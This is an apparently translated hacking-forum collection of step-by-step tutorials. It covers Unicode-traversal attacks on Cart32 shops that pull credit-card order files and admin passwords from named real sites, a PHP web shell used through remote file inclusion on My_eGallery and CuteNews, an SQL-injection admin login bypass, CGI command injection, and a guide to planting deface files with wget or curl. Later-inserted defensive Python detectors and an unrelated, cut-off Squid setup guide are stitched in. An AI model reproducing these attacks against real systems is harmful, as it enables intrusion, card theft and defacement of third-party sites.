October 29, 2010

TUTORIAL HACKING


KOMUNITAS #SOLOHACKERLINK

Allnet + Dalnet


We present this collection of tutorials to those of you who want to learn Hacking,
Defacing, Cracking, and anything related to the world of computers.

But remember: we are not responsible for any misuse of these articles.

-ChanServ- -- Access List for [#solohackerlink] --

-ChanServ- Num Level Hostmask Since last use

-ChanServ- --- ----- -------- --------------

-ChanServ- 1 30 CoCoNuT 1h 18m 36s

-ChanServ- 2 20 Shidex 6d 2h 52m 6s

-ChanServ- 3 10 erisanthi 4w 4d 4h 9m 44s

-ChanServ- 4 25 moxff 8h 25m 27s

-ChanServ- 5 30 CiPaN-2

-ChanServ- 6 20 SouLmaTe 4d 7h 34m 36s

-ChanServ- 7 30 A-kung 2d 2h 48m 50s

-ChanServ- 8 30 hikaru 1w 2d 9h 41m 4s

-ChanServ- 9 20 kenshi 3d 3h 5m 39s

-ChanServ- 10 30 vend3r 3d 13h 54m 51s

-ChanServ- 11 20 ijoo 5d 17h 20m 27s

-ChanServ- 12 10 asLpLs 6d 3h 11m 42s

-ChanServ- 13 15 AnEuk_TeRmin4L 1d 8h 29m 53s

-ChanServ- 14 20 Viper 4d 9h 38m 44s

-ChanServ- 15 44 ToxiCity 3d 3h 24m 9s

-ChanServ- 16 10 [MICROBA] 2d 9h 21m 53s

-ChanServ- 17 14 arioo 1d 23h 26m 29s

-ChanServ- 18 45 SoniX 6h 53m 12s

-ChanServ- 19 10 mozi 3w 4d 1h 5m 39s

-ChanServ- 20 35 Chiboik 2d 2h 48m 55s

-ChanServ- 21 30 WONGEDAN 2d 14h 35m 59s

-ChanServ- 22 10 co_world 1d 9h 52m 12s

-ChanServ- 23 15 rafles 3w 1d 6h 45m 31s

-ChanServ- 24 20 gueng 4d 9h 52m 29s

-ChanServ- 25 15 H4_Kim 1h 1m 18s

-ChanServ- 26 20 djempol 3d 13h 52m 23s

-ChanServ- 27 10 maha_dewa 2d 4h 12m 40s

-ChanServ- 28 10 KuThiLaNK 1d 16m 27s

-ChanServ- 29 40 Pria 3w 10h 37m 37s

-ChanServ- 30 44 jayoes 2h 31m 18s

-ChanServ- 31 20 mikael_boloten 2d 8h 55m 50s

-ChanServ- 32 42 avantika 2w 1d 6h 38m 1s

-ChanServ- 33 40 Cybermoslem 4d 11h 25m 24s

-ChanServ- 34 25 senyum 3d 14h 47m 5s

-ChanServ- 35 44 Bamby 3d 5h 21m 46s

-ChanServ- 36 40 randyy 4d 5h 29m 45s

-ChanServ- 37 30 GeoL 3d 2h 54m 38s

-ChanServ- 38 35 skin 3h 58m 56s

-ChanServ- 39 28 padllepop 23h 42m 53s

-ChanServ- 40 48 saleho 1h 19m 17s

-ChanServ- 41 47 Kiluagank 1w 3d 11h 21m 23s

-ChanServ- 42 15 Pleky 2d 4h 11m 51s

-ChanServ- 43 10 ^YoGa^ 2w 2d 20h 46m 7s

-ChanServ- 44 50 POM_PONK 0s

-ChanServ- 45 10 ahas 8h 57m

-ChanServ- 46 49 eStI 5d 37m 6s

-ChanServ- 47 13 pingembul 2d 11h 7m 42s

-ChanServ- 48 45 garAm 4d 5h 50m 35s

-ChanServ- 49 45 OsKaDoN 2h 31m 51s

-ChanServ- 50 42 andri 23h 20m 48s

-ChanServ- 51 25 Blu3_Cyber 1d 14h 40m 29s

-ChanServ- 52 15 data_base 5w 4d 19h 27m 27s

-ChanServ- 53 48 PeNcOpEt_CiNtA 4d 23h 39m 14s

-ChanServ- 54 9 Dewa_Cinta 14h 47m 42s

-ChanServ- 55 30 RENDY_CO 6w 3d 5h 10m 35s

-ChanServ- 56 30 kethex 6w 2d 9h 52m 22s

-ChanServ- 57 15 SpY|DeR 4d 2h 31m 13s

-ChanServ- 58 35 SkyLine 1w 1d 5h 17m 58s

-ChanServ- 59 20 siti^oke

-ChanServ- 60 35 ajbtk_anton 1w 6d 8h 6m 58s

-ChanServ- 61 25 SaWeX 14w 2d 21h 24m 20s

-ChanServ- 62 15 Teguh 2w 2d 8h 29m 51s

-ChanServ- 63 15 vender 3d 14h 41m 35s

-ChanServ- 64 44 ad|fashLa 1w 8h 50m 58s

-ChanServ- 65 20 IrwansyaH 4d 14h 48m 48s

-ChanServ- 66 25 Comex 4d 5h 32m 40s

-ChanServ- 67 20 Aves 1w 1d 10h 50m 17s

-ChanServ- 68 10 Reny 3w 4d 7h 16m 19s

-ChanServ- 69 44 Malaikat^Mikhael 19h 19m 3s

-ChanServ- 70 40 BuayA 3d 12h 56m 36s

-ChanServ- 71 15 blu_smith87 1d 6h 23m 27s

-ChanServ- 72 20 ricky 11h 36m 28s

-ChanServ- 73 40 madiun 3w 5d 15h 1m 46s

-ChanServ- 74 45 solohackerlink 2w 4d 5h 5m 50s

-ChanServ- 75 20 sTeVe_YaN9_SDiKiT_ImOeT 4d 2h 32m 8s

-ChanServ- 76 15 AndyBogard 2w 2d 12h 53m 41s

-ChanServ- 77 44 cupid 19h 26m 44s

-ChanServ- 78 47 TAKESI 6s

-ChanServ- 79 20 wahyu_20 11h 15m 41s

-ChanServ- 80 20 WoNg`Edan 7h 2m 9s

-ChanServ- 81 15 GoD_Army 4d 5h 15m 12s

-ChanServ- 82 14 Pico 1d 2h 37m 59s

-ChanServ- 83 44 cOCa-cOLa 15h 20m 30s

-ChanServ- 84 20 SuPeR_MaN 9h 48m 37s

-ChanServ- -- End of list --

Cart32 v3.5a

##############################################################################

TUTORIAL I : Cart32 v3.5a

by : PeNcOpEt_CiNtA

Posted : 11 October 2005

##############################################################################

NB : This can only be used against a few sites that share the same
weakness.

Step 1: First find a website running Cart32 v3.5a

Step 2: Search every search engine you know
with the keyword " Cart32 v3.5a "

Step 3: Go to the website's Cart32.exe

http://target/login/unicode/cart32.exe

(example : http://www.connectionsmall.com/scripts/cart32.exe/)

Step 4: Once you are in there, you will be shown a screen
like the one below :

========================================

Cart32 v3.5a

Shopping Cart System for Windows

http://www.cart32.com/

Registered to Greymane Connections    License: Unlimited clients

©1996-2001 McMurtrey/Whitaker & Associates, Inc.    Build 714

========================================

Step 4: Now what you have to do is append one of the following
extensions to the end of the URL; 98% of them use #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)

b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:)

c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:)

ONLY USED OCCASIONALLY!

(example: http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:)

Step 5: Once you are in the root directory (c:), to get to the
cc's, append (progra~1MWAIncCart32) to the end of that URL
so that you now see something like :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:progra~1mwainccart32

Now you can see many files such as :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

Step 6: Copy one of those file names and then append it
to the end of the URL, and it will look like :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:progra~1mwainccart322814659000-001003.c32

Note : There you will see other files containing a great many
cc's, such as :

RONACK-orders.txt (this file is not on this particular site)

procure-orders.txt (this file is not on this particular site)

Step 7: Before you access the other file types, you first have to change
*c+dir+c:* to *c+type+c:*

========================================

TUTORIAL II : Cart32 v3.5a

----------------------------------------

Target: http://www.partybows.com

1. Go to http://www.partybows.com

2. Click http://www.partybows.com/seasonal.htm

3. Fill in Quantity= 1, basically act as if you are buying, and click order

4. You will then end up here :

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem

5. Change it to

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error

Cart32 v3.5 Error

CART32 Build 619

The following internal error has occurred: Invalid procedure

Error Number = 5

Click Here For Possible Solutions

etc.

6. Look for the order log

Cart32 Setup Info and Directory

Mail Server = mail.axion.net Section=Main

AdminDir = D:securewebrootpartybowscgi-bincart32

So it is partybows-orders.txt.

Which finally gives :

http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

7. Or, to get the admin password, you just type cart32.ini

https://secure.axionet.com/partybows/cgi-bin/cart32.ini

without even meaning to, you will download the admin password
that is in its cart32.ini file.

You will get the admin password in encrypted form;
then try to decrypt it with the software

" Cart32decoder.exe "

8. To get the client names and passwords in Cart32
you can try typing "CLIENT.DBF"

or :

the order file in "ORDER" or "ORDERS.DBF"

========================================

TUTORIAL III : Cart32 v3.5a

----------------------------------------

search +/scripts/cart32.exe/

Exploitable Directories

-/scripts/cart32.ini

-/scripts/cart32.exe

-/scripts/cart32.exe/cart32clientlist

-/script/c32web.exe/ChangeAdminPassword

-/scripts/c32web.exe

-cgi-shl/c32web.exe/

Wherever there is the cart32.exe, add this to the end of it: /cart32clientlist

and erase the rest; a menu will come up with a submit box, click go.

It will list ALL clients and their passwords; the passwords will be encrypted.

After decrypting the password, go to wherever the [c32web.exe] file is.

That's the instructions with exploits, from that channel we were just in.
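The three URL forms in Tutorial I all rely on the same defect: the percent-encoded bytes %c0%af, %c1%9c and %e0%80%af are not valid UTF-8, but a permissive decoder turns them into '/' or '\' after the path has already been checked for "..". The Python script below is an added example, not code from the tutorial or its author. It decodes request paths the way such a decoder would, flags overlong sequences and any path that climbs above the web root, and runs over a few constructed request lines modelled on the URLs above (nothing is sent to any server). Point it at the request column of a web server access log to find such attempts.

```python
"""Detect overlong-UTF-8 ("Unicode") directory traversal in request paths.

Added example, not part of the original write-up. The request lines below
are constructed to resemble the URLs the tutorial shows; nothing here
talks to a server.
"""
from urllib.parse import unquote_to_bytes

# Overlong encodings of '/' (U+002F) and '\' (U+005C). A strict decoder
# rejects these; a permissive one accepts them, which is the bug the
# Cart32 tutorial rides on. Longest sequences first so replacement is safe.
OVERLONG = [
    (b"\xf0\x80\x80\xaf", b"/"),
    (b"\xe0\x80\xaf", b"/"),
    (b"\xc0\xaf", b"/"),
    (b"\xe0\x81\x9c", b"\\"),
    (b"\xc1\x9c", b"\\"),
]


def lenient_decode(path: str) -> str:
    """Percent-decode, then fold overlong sequences the way a permissive
    decoder would, so the result is the path the server actually used."""
    raw = unquote_to_bytes(path)
    for seq, replacement in OVERLONG:
        raw = raw.replace(seq, replacement)
    return raw.decode("utf-8", errors="replace").replace("\\", "/")


def has_overlong(path: str) -> bool:
    """True if the raw path contains any overlong sequence at all; a
    legitimate client never sends these."""
    raw = unquote_to_bytes(path)
    return any(seq in raw for seq, _ in OVERLONG)


def escapes_root(decoded: str) -> bool:
    """Walk the decoded path and report whether '..' ever climbs above
    the virtual root (normpath would hide that by collapsing it)."""
    depth = 0
    for part in decoded.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part not in ("", "."):
            depth += 1
    return False


def classify(request_path: str) -> dict:
    """Flag a single request path; the query string is ignored."""
    path = request_path.split("?", 1)[0]
    decoded = lenient_decode(path)
    return {
        "overlong": has_overlong(path),
        "traversal": escapes_root(decoded),
        "cmd_exe": "cmd.exe" in decoded.lower(),
        "decoded": decoded,
    }


# Constructed sample request paths (not a real log).
SAMPLE_REQUESTS = [
    "/scripts/cart32.exe/",
    "/scripts/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:",
    "/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:",
    "/images/..%2f..%2fetc/passwd",
    "/docs/a/../b.html",
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return the request paths that should raise an alert."""
    hits = []
    for req in requests:
        verdict = classify(req)
        if verdict["overlong"] or verdict["traversal"]:
            hits.append(req)
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req), req)
```

The check deliberately alerts on any overlong sequence, even one that does not reach above the root, because no browser emits them; the plain "%2f" traversal in the fourth sample is caught by the depth walk alone.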

-------------------------------------------------------------------------------------------------

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 08:56:21 ]

My_eGallery security exploit

##############################################

My_eGallery security exploit

Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )

##############################################

Bugs File may be : displayCategory.php

Display : http://www.target.com/modules/My_eGallery/public/displayCategory.php

Note :

For attacking you must use this script; save it and upload it to your website.

e.g. save it with the file name : cmd.txt

e.g. from my site : http://www.geocities.com/seng_due/script/solohackerlink.txt

---------------- script from here -----------------------------------------------------

PeNcOpEt_CiNtA - WAS HERE !!!

TEST YOUR SERVER'S SECURITY SYSTEM!!!

(banner image: http://www.geocities.com/aritrokok/aritrokok.jpg)

<?php

# saleho PHP :

# Released by : Solohackerlink-Crew

// CMD - To execute a command through a file injection bug ( gif - jpg - txt )

if (isset($chdir)) @chdir($chdir);

ob_start();

system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

$output = ob_get_contents();

ob_end_clean();

if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));

?>

#SOLOHACKERLINK

------------------ End of Script ---------------------------------------------------------

###################################

Ok, and now let's search for your target

###################################

1. search in all search engines, e.g. --> "allinurl:displayCategory.php" or "My_eGallery"

2. Get a target site like -->

http://www.target.com/modules/My_eGallery/public/displayCategory.php

3. test the attack with the code :

?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;

4. Attack display :

http://www.target.com/modules/My_eGallery/public/displayCategory.php?basepath=http://if-istp.net/cmd.txt?&cmd=uname -a;id;

5. Linux and Unix commands used here :P~ e.g. : ls -al , uname -r , cat , echo , etc....

6. So, what are you waiting for !!!

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:53:10 ]

s-cart vulnerability

##############################################

S-Cart Bugs injection

Author : PeNcOpEt_CiNtA

##############################################

Bugs File : admin page --> /admin

Display : http://target.com/s-cart/admin

1. search in all search engines, e.g. --> allinurl:s-cart/index.phtml or "s-cart"

2. Get a target site like --> http://www.target.com/s-cart/index.phtml

3. and now go to the admin page by changing the URL to :

http://www.target.com/s-cart/admin --> the browser automatically opens a login and password prompt !!!

login : admin

passwd : 'or''='

4. If you are lucky, you can see the admin manager; show the Order table now or deface the s-cart page.

Ok, let's try :P~
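The passwd value 'or''=' only works when the admin page pastes the form fields straight into its SQL string. The Python example below is added here and is not s-cart's code; it builds a constructed SQLite table and runs the same login query two ways, string-formatted (the value becomes SQL and the WHERE clause is always true) and with bound parameters (the value is compared as data and the login fails), so the behaviour can be reproduced without touching any site.

```python
"""Why the login value 'or''=' works: string-built SQL versus parameters.

Added example, not code from the s-cart post. Uses an in-memory SQLite
table with a constructed admin row; no real application is involved.
"""
import sqlite3

PAYLOAD = "'or''='"  # the passwd value the post types into the login form


def setup_db() -> sqlite3.Connection:
    """Constructed admin table. Carts of that era stored plaintext
    passwords; a real application should store a salted hash instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (login TEXT, passwd TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'demo-only-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, login: str, passwd: str) -> bool:
    """Builds the query by string formatting. With the payload the clause
    becomes  passwd='' or ''=''  and the OR branch is always true."""
    sql = "SELECT COUNT(*) FROM admins WHERE login='%s' AND passwd='%s'" % (login, passwd)
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, login: str, passwd: str) -> bool:
    """Same query with bound parameters: the value is data, never SQL."""
    sql = "SELECT COUNT(*) FROM admins WHERE login=? AND passwd=?"
    return conn.execute(sql, (login, passwd)).fetchone()[0] > 0


def demo() -> dict:
    """Run both variants with the payload and with the real password."""
    conn = setup_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "admin", PAYLOAD),
        "vulnerable_real_pw": login_vulnerable(conn, "admin", "demo-only-password"),
        "param_bypassed": login_parameterized(conn, "admin", PAYLOAD),
        "param_real_pw": login_parameterized(conn, "admin", "demo-only-password"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Bound parameters fix the bypass on their own; the same change applies to every other field the admin page reads from the request, not only passwd.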

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:49:25 ]

display.cgi vulnerability

##############################################

Abrior´s Encore WebForum ( display.cgi )

Author : PeNcOpEt_CiNtA ( seng_due@yahoo.co.id )

Forum : #Cracked On aLL.NeT

##############################################

Bugs File : /forumcgi/display.cgi?

Display : http://www.target.com/encore/forumcgi/display.cgi?

1. search in all search engines, e.g. --> allinurl:forumcgi/display.cgi?

2. Get a target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp

3. and now go to the exploit by inserting this code :

&page=anonymous&file=|uname%20-a|

4. Full display like :

http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|

5. Linux or Unix commands are available here... Good Luck :P~

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:48:30 ]

cutenews vulnerability

********************************************

PeNcOpEt_CiNtA From Solohackerlink

********************************************

This time the bug hits CuteNews (written in PHP), where the bug is in shownews.php;
the cutepath variable is used for execution. You can use news.txt or config.php to
find out the commands from PHP.

ok.. let's just continue...

the hacking concept is as follows:

http://target.com/cutenews/shownews.php?cutepath=http://inject.com

now, how do we get such a target???

hehehehe curious, right... ok.. open up uncle Google and give it the following
keyword:

inurl:cutenews/shownews.php

see.... lots of them, right....

for example:

www.flip-script.com/cutenews/shownews.php

then you change it into this

http://www.flip-script.com/cutenews/shownews.php?cutepath=http://geocities.com/seng_due/script/solohackerlink.txt?&cmd=id

hehehe and see what happens....

after that you can experiment on your own OK....
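The My_eGallery, display.cgi and CuteNews posts above share two request shapes: an include-path parameter (basepath, cutepath) whose value is a remote URL, and a parameter whose value wraps a reconnaissance command in shell metacharacters (|uname -a|, ;id;). The Python script below is an added example, not from any of the posts; it parses a handful of constructed access-log lines (attacker.example and the client addresses are placeholders) and reports which requests show those shapes, splitting the query on & only so that the ';' inside an injected command is not mistaken for a separator.

```python
"""Find remote-file-inclusion and command-injection shapes in web logs.

Added example, not code from the My_eGallery, display.cgi or CuteNews
posts. The log lines are constructed; attacker.example and the client
addresses are placeholders.
"""
import re
from urllib.parse import unquote

# Combined-log-format prefix: we only need the client IP and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)   # ?basepath=http://... (RFI)
SHELL_META = re.compile(r"[|;`]|\$\(")                # |cmd| , ;cmd; , `cmd`, $(cmd)
RECON_CMD = re.compile(r"\b(uname|id|ls|cat|pwd|whoami|wget|curl)\b")
CMD_PARAMS = {"cmd", "command", "exec"}               # names the dropped shells read

SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2005:06:53:10 +0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/cmd.txt?&cmd=uname%20-a;id; HTTP/1.0" 200 512
203.0.113.5 - - [11/Nov/2005:06:48:30 +0700] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a| HTTP/1.0" 200 233
203.0.113.5 - - [11/Nov/2005:06:43:10 +0700] "GET /cutenews/shownews.php?cutepath=http://attacker.example/shell.txt?&cmd=id HTTP/1.0" 200 871
198.51.100.7 - - [11/Nov/2005:07:00:00 +0700] "GET /modules/My_eGallery/public/displayCategory.php?cid=3 HTTP/1.1" 200 4096
198.51.100.7 - - [11/Nov/2005:07:01:00 +0700] "GET /search.php?q=cat%20photos HTTP/1.1" 200 1400
"""


def parse_query(target: str) -> list:
    """Split the query on '&' only; ';' is part of the injected command,
    so it must not be treated as a separator. Values are percent-decoded."""
    if "?" not in target:
        return []
    pairs = []
    for chunk in target.split("?", 1)[1].split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def analyse_target(target: str) -> list:
    """Return (parameter, finding) pairs for one request target."""
    findings = []
    for name, value in parse_query(target):
        if REMOTE_URL.match(value):
            findings.append((name, "remote_url"))
        if SHELL_META.search(value) and RECON_CMD.search(value):
            findings.append((name, "command_injection"))
        elif name.lower() in CMD_PARAMS:
            findings.append((name, "cmd_parameter"))
    return findings


def scan_log(text: str) -> list:
    """Return (ip, target, findings) for every log line that raises a finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyse_target(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

A remote_url finding on an include-style parameter is the strongest signal on its own; the two benign lines show that a word like "cat" in ordinary search text is not enough to trigger the command_injection rule, which also requires a metacharacter.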

Post by : PeNcOpEt_CiNtA on [ 11 November 2005 06:43:10 ]

Dropping a file

DROPPING A FILE ON A SITE THAT HAS A SECURITY HOLE

(other people might call it defacing)

Hehehe, odd title, right.... Other people would probably prefer to call it a deface.
Actually there is a small difference between defacing and dropping a file: a deface
changes the appearance of a site, whether the main page or not (it is somewhat
destructive), whereas dropping a file merely places a separate file on a site without
changing any particular page of the site that was broken into.

OK... I think that's enough small talk. Let's go straight to the main discussion.

There are quite a few steps needed before you can drop a file on a site that
has a security hole.

1. Learn the basic commands of the operating systems, both Windows and the *nix family (Linux, BSD,
MacOS, SunOS, Unix, etc.)

2. Find and study the web application bugs that are out there.

3. Learn how to use search engines (especially Google).

4. Prepare a few files that may be used later, then store them on some site (if you
can't afford to buy one, well.... just make a free site)

5. Learn how to find the list of sites on a server (usually one site can consist of many
sites, some even hundreds)

1. Basic operating system commands

Below I will explain a few basic commands of the operating systems, both Windows
and *nix, that may come in handy when breaking into a system later.

To try out these basic commands, on Windows use the DOS prompt, while on *nix use
sh, bash, bsh and so on (the command line interface).

What if you are a Windows user and still want to try the *nix commands? Try looking for
sites that provide free shells, which can be used through telnet or PuTTY.

DOS     *NIX    Description

dir     ls      List the files in a directory

ren     mv      Rename a file

copy    cp      Copy a file

del     rm      Delete a file or directory

mkdir   mkdir   Create a new directory

type    cat     View the contents of a file

cd      cd      Change directory

        pwd     Show the current directory

2. Web application bugs

There are several kinds of bugs, among them remote command execution, file injection and SQL
injection.

Example :

phpBB2 remote command execution:

http://korban.com/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=id;pwd;ls -al

CGI remote command execution

http://korban.com/index.cgi?page=view.txt|id;pwd|

PHP file injection

http://korban.com/index.php?file=http://situsmu.com/file_inject.txt?cmd=id;pwd

ASP-MSSQL SQL injection

http://korban.com/index.asp?id=1;update table set field5='hacked' where field1=1

To get more web application bugs, please visit the security sites
or hacker sites that are out there.

3. Using a search engine (Google)

Google is a search engine that hackers use very often to find sites that
have security holes. There are several options that can be added to the keyword
to narrow down the search.

allinurl:file_manager.php -> search only for sites that have the file file_manager.php

intitle:hacked -> search for sites whose title contains the word hacked

There are several more options that can be used. These options can be used
together so that the scope of the search results is narrower still.

Please read about them directly at google.com or on hacker sites for further
information.

4. Files that may be needed

Below are the files that may be needed to carry out an intrusion.

Phpshell

Phpshell can be used to exploit a file injection bug, or be stored on a site that has
already been broken into, to run shell commands on a system that uses PHP
as its web programming language.

Cgitelnet

CGI telnet can only be run once it has been planted on a site; its function is the same as
phpshell, namely running shell commands. For sites that use Perl.

cmdAsp

the same function as phpshell and CGI telnet, on sites that use ASP.

5. Finding the names and directories of other sites on the same server

There are several methods that can be used (*nix), assuming that the id we got
is apache, nobody, httpd, or www. If the id we got is a user name then
congratulations... we can deface the main page.

a. httpd.conf

Look for the httpd.conf file by running the command locate httpd.conf.

Suppose the result is /etc/httpd/httpd.conf; view its contents with the command cat /etc/httpd/httpd.conf

If we are lucky, that file contains a list of site names along with their root directories.

If it is not there, use another method.

b. /etc/passwd

We can use the /etc/passwd file to feel out where the site directories are

To do so, run the command pwd; suppose the result is /home/telo/public_html

Next, view the contents of /etc/passwd with the command cat /etc/passwd

Look at the contents and note every user entry containing the word /home

For example /home/user1, /home/user2

From this we only get the root directory of a site, but do not yet know the site's
name.

So how do we find out? The manual way, which is by looking through the contents of the files
in that site's directory, for example cd /home/user1/public_html;cat index.html; this method
requires a little patience :)

c. /home

Suppose the result of pwd is /home/telo/public_html.

Run the command ls /home to see the contents of the /home directory

If it gives a result, we are quite lucky, because most servers do not allow
nobody to see the contents of that directory.

What follows is almost the same as part b above; this method is also similar if we get a pwd
result like /etc/www/vhost/teloganyong.com/httpdocs.

OK, that is enough introduction for now; let's try a case that is close to
real.

As an illustration, I prefer getting a PHP file injection bug, so that bug is
the example :)

http://korban.com/index.php?file=http://situsmu.com/inject.txt? (don't forget the question mark character)

(I assume the inject.txt file consists of one textbox and one submit button)

1. Enter the command id;pwd;ls -al

2. Look at the result; from here on we assume the result is id=nobody,
pwd=/home/korban/public_html, and the result of ls -al does not need to be mentioned.

3. Find a place where we are allowed to write, by running the command

find /home/korban/public_html -perm 777 -type d

4. If a list of directories appears from the command in step 3, that means we can write

5. Suppose the result is /home/korban/public_html/images

6. Put in the file you want to plant by running the command

cd /home/korban/public_html/images;wget http://situsmu.com/deface.html;ls (for example); the ls
command is used to check whether the file was planted successfully

7. If it succeeds, we can access that file at http://korban.com/images/deface.html

8. done

note: for the command that fetches the file, wget may be absent or may need extra
options; please try the following alternatives

wget http://situsmu.com/deface.html

wget -o deface.html http://situsmu.com/deface.html

curl -o deface html http://situsmu.com/deface.html

lwp-download http://situsmu.com/deface.html

fetch http://situsmu.com/deface.html

linx http://situsmu.com/deface.html

if it still does not work, please use the echo command to write the file
directly

cd /home/korban/public_html/images;echo tested by telo > telo.html;ls

http://korban.com/images/telo.html
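The write-up above depends on two things a site owner can check for: a directory under the web root that anyone may write to (the find ... -perm 777 -type d step) and a file that appeared there afterwards (telo.html). The Python script below is an added example, not part of the post; it builds a throwaway web root under a temp directory (all paths constructed), lists world-writable directories, takes a SHA-256 manifest, reports files added since the manifest was taken, and removes the world-write bit from the offending directories.

```python
"""Audit a web root for world-writable directories and dropped files.

Added example, not part of the original post. It builds a throwaway
directory tree under a temp dir so it runs anywhere; every path is
constructed, nothing is read from a real site.
"""
import hashlib
import os
import stat
import tempfile


def _rel(full: str, root: str) -> str:
    return os.path.relpath(full, root).replace(os.sep, "/")


def world_writable_dirs(root: str) -> list:
    """Directories under root that any user may write to (the o+w bit),
    i.e. what 'find root -perm 777 -type d' would show."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            if os.stat(full).st_mode & stat.S_IWOTH:
                found.append(_rel(full, root))
    return sorted(found)


def manifest(root: str) -> dict:
    """Map each file's path (relative to root) to its SHA-256 digest."""
    out = {}
    for dirpath, _, filenames in os.walk(root):
        for f in filenames:
            full = os.path.join(dirpath, f)
            with open(full, "rb") as fh:
                out[_rel(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Files added, removed or changed since the baseline was taken."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in common if baseline[p] != current[p]),
    }


def harden(root: str) -> list:
    """Clear the world-write bit on every directory reported; return them."""
    fixed = []
    for rel in world_writable_dirs(root):
        full = os.path.join(root, rel)
        os.chmod(full, os.stat(full).st_mode & ~stat.S_IWOTH)
        fixed.append(rel)
    return fixed


def build_demo_tree() -> str:
    """Constructed web root: public_html with a mode-0777 images directory."""
    root = tempfile.mkdtemp(prefix="public_html_")
    os.makedirs(os.path.join(root, "images"))
    os.makedirs(os.path.join(root, "css"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html>welcome</html>\n")
    os.chmod(os.path.join(root, "images"), 0o777)
    os.chmod(os.path.join(root, "css"), 0o755)
    return root


def demo() -> dict:
    """Audit, simulate the dropped file from the post, detect it, harden."""
    root = build_demo_tree()
    writable_before = world_writable_dirs(root)
    baseline = manifest(root)
    # Constructed stand-in for the 'echo ... > telo.html' step in the post.
    with open(os.path.join(root, "images", "telo.html"), "w") as fh:
        fh.write("tested by telo\n")
    delta = diff_manifest(baseline, manifest(root))
    fixed = harden(root)
    return {
        "writable_before": writable_before,
        "delta": delta,
        "fixed": fixed,
        "writable_after": world_writable_dirs(root),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Store the manifest outside the web root, since a writable directory is exactly where an attacker would edit it; the "changed" list covers the deface case (an existing page rewritten) while "added" covers the dropped file.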

Post by : x`shell on [ 10 November 2005 17:43:02 ]

Installing Squid + Compiling the Kernel + HTB + IPTABLES


==================================================

This configuration is intended for Madya (c3p0t) and Dana (suheng) of Warnet Citra Pangkalpinang and
Warnet Speednet Pangkalpinang.

Download the Squid source:

wget -c http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE7.tar.bz2

Extract the Squid source:

tar -jxf squid-2.5.STABLE7.tar.bz2

Configure Squid:

cd squid-2.5.STABLE7

make sure the glibc package is installed on the system:

installpkg /mnt/cdrom/slackware/l/glibc*.tgz

./configure --prefix=/usr/local/squid \
    --exec-prefix=/usr/local/squid \
    --enable-delay-pools --enable-cache-digests \
    --disable-ident-lookups --enable-async-io=16 \
    --enable-removal-policies="lru,heap" \
    --enable-poll --enable-linux-netfilter

Install Squid:

make

make install

Standard squid.conf file:

##########################

http_port 3128

icp_port 3130

hierarchy_stoplist cgi-bin ?

acl QUERY urlpath_regex cgi-bin ?

no_cache deny QUERY

cache_mem 8 MB

